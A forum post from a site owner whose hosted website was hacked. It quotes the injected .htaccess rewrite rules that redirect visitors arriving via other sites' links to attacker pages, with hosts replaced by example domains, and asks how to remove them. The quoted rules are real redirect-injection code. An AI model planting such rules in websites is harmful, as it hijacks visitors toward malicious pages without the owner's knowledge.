dr0832 - 5:33 am on Jan 13, 2013 (gmt 0)

Hi I just noticed my website has been redirecting to a different website without my knowledge. The site is hosted on Luckyregister which is basically Godaddy. My Htaccess is redirecting to http://example.com/hecs.html. When I looked at Htacess there is also some russian site: http://example.tu/mhos.html which I assume has something to do with whoever did this.

Can anyone tell me exactly how to get rid of this and give me an example of the default code for the Htaccess file? I really have no clue about this sort of thing. I notice I have 3 Htacess files that have the identical code below. Also I found 3 php files on my server (called default.php) that had some sort of encrypted code in them and I read that these were somehow linked to the hack in my Htacess file.

Also if possible I would like to add the code to the default Htacess so this can't happen again. Any help would be appreciated since I have no experience with any of this, yet more knowledge than the average person.

________________________________



RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/\1$ [NC]
RewriteRule ^.*$ http://example.com/hecs.html?h=1127349 [L,R]



RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/\1$ [NC]
RewriteRule ^.*$ http://example.ru/mhos.html [L,R]

[edited by: incrediBILL at 7:01 am (utc) on Jan 13, 2013]
[edit reason] fixed URLS, use Example.com [/edit]